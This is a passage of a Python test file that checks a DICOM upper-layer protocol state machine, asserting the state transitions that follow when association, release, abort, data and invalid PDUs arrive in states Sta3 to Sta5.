"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_pdata())
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt9']
def test_evt10(self):
"""Test Sta3 + Evt10."""
# Sta3 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', p_data_tf),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt10', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt10']
def test_evt11(self):
"""Test Sta3 + Evt11."""
# Sta3 + Evt11 -> <ignore> -> Sta3
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_release(False))
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt11']
def test_evt12(self):
"""Test Sta3 + Evt12."""
# Sta3 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', a_release_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt12', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt12']
def test_evt13(self):
"""Test Sta3 + Evt13."""
# Sta3 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', a_release_rp),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt13', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt13']
def test_evt14(self):
"""Test Sta3 + Evt14."""
# Sta3 + Evt14 -> <ignore> -> Sta3
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_release(True))
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt14']
def test_evt15(self):
"""Test Sta3 + Evt15."""
# Sta3 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_abort())
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt15', 'AA-1'),
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt15']
def test_evt16(self):
"""Test Sta3 + Evt16."""
# Sta3 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', a_abort),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt16', 'AA-3')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt16']
def test_evt17(self):
"""Test Sta3 + Evt17."""
# Sta3 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('wait', 0.1),
('send', a_associate_rq),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt17', 'AA-4')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt17']
def test_evt18(self):
"""Test Sta3 + Evt18."""
# Sta3 + Evt18 -> <ignore> -> Sta3
# Evt18: ARTIM timer expired from <local service>
commands = [
('wait', 0.1),
('send', a_associate_rq),
('wait', 0.5)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
assoc.dul.artim_timer.timeout = 0.05
assoc.dul.artim_timer.start()
time.sleep(0.2)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt18']
def test_evt19(self):
"""Test Sta3 + Evt19."""
# Sta3 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00'),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt19', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt19']
class TestState04(TestStateBase):
"""Tests for State 04: Awaiting TRANSPORT_OPEN from <transport service>."""
def test_evt01(self):
"""Test Sta4 + Evt1."""
# Sta4 + Evt1 -> <ignore> -> Sta4
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta4 + Evt2."""
# Sta4 + Evt2 -> <ignore> -> Sta4
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta4 + Evt3."""
# Sta4 + Evt3 -> <ignore> -> Sta4
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
commands = [
('send', a_associate_ac)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt3']
def test_evt04(self):
"""Test Sta4 + Evt4."""
# Sta4 + Evt4 -> <ignore> -> Sta4
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
commands = [
('send', a_associate_rj)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta4 + Evt5."""
# Sta4 + Evt5 -> AE-5 -> Sta2
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
# AE-5: Issue TRANSPORT_RESPONSE to <transport service>
# Start ARTIM timer
pass
def test_evt06(self):
"""Test Sta4 + Evt6."""
# Sta4 + Evt6 -> <ignore> -> Sta4
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
commands = [
('send', a_associate_rq)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt6']
def test_evt07(self):
"""Test Sta4 + Evt7."""
# Sta4 + Evt7 -> <ignore> -> Sta4
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt7']
def test_evt08(self):
"""Test Sta4 + Evt8."""
# Sta4 + Evt8 -> <ignore> -> Sta4
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt8']
def test_evt09(self):
"""Test Sta4 + Evt9."""
# Sta4 + Evt9 -> <ignore> -> Sta4
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt9']
def test_evt10(self):
"""Test Sta4 + Evt10."""
# Sta4 + Evt10 -> <ignore> -> Sta4
# Evt10: Receive P-DATA-TF PDU from <remote>
commands = [
('send', p_data_tf)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt10']
def test_evt11(self):
"""Test Sta4 + Evt11."""
# Sta4 + Evt11 -> <ignore> -> Sta4
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt11']
def test_evt12(self):
"""Test Sta4 + Evt12."""
# Sta4 + Evt12 -> <ignore> -> Sta4
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
commands = [
('send', a_release_rq)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt12']
def test_evt13(self):
"""Test Sta4 + Evt13."""
# Sta4 + Evt13 -> <ignore> -> Sta4
# Evt13: Receive A-RELEASE-RP PDU from <remote>
commands = [
('send', a_release_rp)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
while not self.fsm.current_state == 'Sta4':
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt13']
def test_evt14(self):
"""Test Sta4 + Evt14."""
# Sta4 + Evt14 -> <ignore> -> Sta4
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt14']
def test_evt15(self):
"""Test Sta4 + Evt15."""
# Sta4 + Evt15 -> <ignore> -> Sta4
# Evt15: Receive A-ABORT (rq) primitive from <local user>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt15']
def test_evt16(self):
"""Test Sta4 + Evt16."""
# Sta4 + Evt16 -> <ignore> -> Sta4
# Evt16: Receive A-ABORT PDU from <remote>
commands = [
('send', a_abort)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt16']
def test_evt17(self):
"""Test Sta4 + Evt17."""
# Sta4 + Evt17 -> <ignore> -> Sta4
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
commands = []
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt17']
def test_evt18(self):
"""Test Sta4 + Evt18."""
# Sta4 + Evt18 -> <ignore> -> Sta4
# Evt18: ARTIM timer expired from <local service>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt18']
def test_evt19(self):
"""Test Sta4 + Evt19."""
# Sta4 + Evt19 -> <ignore> -> Sta4
# Evt19: Received unrecognised or invalid PDU from <remote>
commands = [
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00\x00')
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt19']
class TestState05(TestStateBase):
"""Tests for State 05: Awaiting A-ASSOCIATE-AC or A-ASSOCIATE-RJ PDU."""
def test_evt01(self):
"""Test Sta5 + Evt1."""
# Sta5 + Evt1 -> <ignore> -> Sta5
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None), # recv a-associate-rq
('wait', 0.2)
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta5 + Evt2."""
# Sta5 + Evt2 -> <ignore> -> Sta5
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta5 + Evt3."""
# Sta5 + Evt3 -> AE-3 -> Sta6
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AE-3: Issue A-ASSOCIATE (ac) primitive
commands = [
('recv', None),
('send', a_associate_ac),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt3']
def test_evt04(self):
"""Test Sta5 + Evt4."""
# Sta5 + Evt4 -> AE-4 -> Sta1
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AE-4: Issue A-ASSOCIATE (rj) primitive
commands = [
('recv', None),
('send', a_associate_rj),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt4', 'AE-4'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta1']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta1 + Evt5."""
# Sta5 + Evt5 -> <ignore> -> Sta5
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
# AE-5: Issue TRANSPORT_RESPONSE to <transport service>
# Start ARTIM timer
pass
def test_evt06(self):
"""Test Sta5 + Evt6."""
# Sta5 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_rq),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
